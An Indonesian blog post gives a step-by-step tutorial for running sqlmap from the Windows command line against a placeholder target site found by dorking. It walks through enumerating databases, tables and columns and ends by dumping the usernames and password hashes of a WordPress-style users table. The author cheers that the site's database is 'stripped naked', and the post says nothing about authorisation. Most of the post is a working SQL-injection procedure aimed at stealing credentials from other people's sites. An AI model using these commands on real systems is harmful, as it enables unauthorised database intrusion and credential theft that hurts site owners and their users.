CARA MEMAKAI SQLMAP DI WINDOWS MELALU CMD

Posted by : Arief Hilman Nugraha Wednesday, February 13, 2013

kali ini Arief mau share CARA PAKAI SQLMAP DI WINDOWS MELALUI CMD atau bahasa inggris nya Step By Step Pentest web with sqlmap big grin
langsung ajah yukkk ke tkp day dreaming
alat alat yang anda butuhkan :
1.komputer
2.dork
3.python versi 2.7
4.script SQLmap
5.internet
untuk bagian alat alat yang nomer 3 dan 4 bisa sobat dapatkan di google laughing bukannya ane ga mau share tapi koneksi ane gak mampu buat upload semua nya mudah mudahan mbah google bisa bantu sobat buat nemuin semua yang di perlukan  sad oke mari kita lanjutkan cool
pertama kita buka CMD lalu ketikan command berikut
sqlmap.py -u http://www.siteTARGET.com/hki/news/news.php?id
=37 --dbs
atau bisa juga dengan command berikut
 sqlmap.py -u http://www.siteTARGET.com/hki/news/news.php?id=37 --current-db
lalu tekan  enter,,jika site nya vuln atau vulnerable maka hasilnya akan tampak seperti SS yang ada di bawah ini
klik untuk memperbesar
untuk tahap selanjutnya lalu ita ketikan command di bawah pada CMD sobat ( sebelumnya sobat sudah menentukan database mana yang ingin sobat lihat )
sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id=37 -D wpdb_1n0v4s1 --tables
maka hasilnya akan tampak seperti yang ada di SS di bawah
klik untuk memperbesar
selanjutnya kita ketikan lagi command yg di bawah ini di CMD sobat
sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id=37 -D wpdb_1n0v4s1 -T wp_tbl_1n0v4s1users --columns
maka hasilnya akan tampak seperti ss di bawah
klik untuk memperbesar
langkah selanjutnya kita ketikan command yg di bawah ini di CMD sobat
sqlmap.py -u http://www.siteTARGET/hki/news/news.php?id
=37 -D wpdb_1n0v4s1 -T wp_tbl_1n0v4s1users -C user_login,user_pass --dump
 maka hasilnya seperti yang di bawah ini cool jreng jreng telanjang dah tuh database website nya rolling on the floor
klik untuk memperbesar 
sebagai catatan buat sobat arti dari command command yang di atas :
--dbs ( memanggil semua database yang ada dalam server )
--current-db ( hanya mengambil database yang terkait di dalam situs web tersebut )
--tables ( memanggil table yang ada di dalam database )
--columns ( memanggil kolom yang ada di dalam database table )
--dump ( memanggil username dan password yg terdapat di dalam database tabel )

kira kira seperti itu lah CARA MEMAKAI SQLMAP DI WINDOWS MELALU CMD
mudah mudahan tutor ini bisa bermanfaat buat sobat yang membutuhkannya jika tutor ini  kurang sempurna harap di maafkan karena saya juga masih tahap belajar  rock on!

{ 1 comments ... read them below or add one }


Welcome to My Blog

Berlangganan Lewat Email

Subscribe via Email

Translate

Lagu

- Copyright © Arief Hilman Nugraha - Robotic Notes - Disponsori Oleh Blogger - Editing by Arief Hilman Nugraha -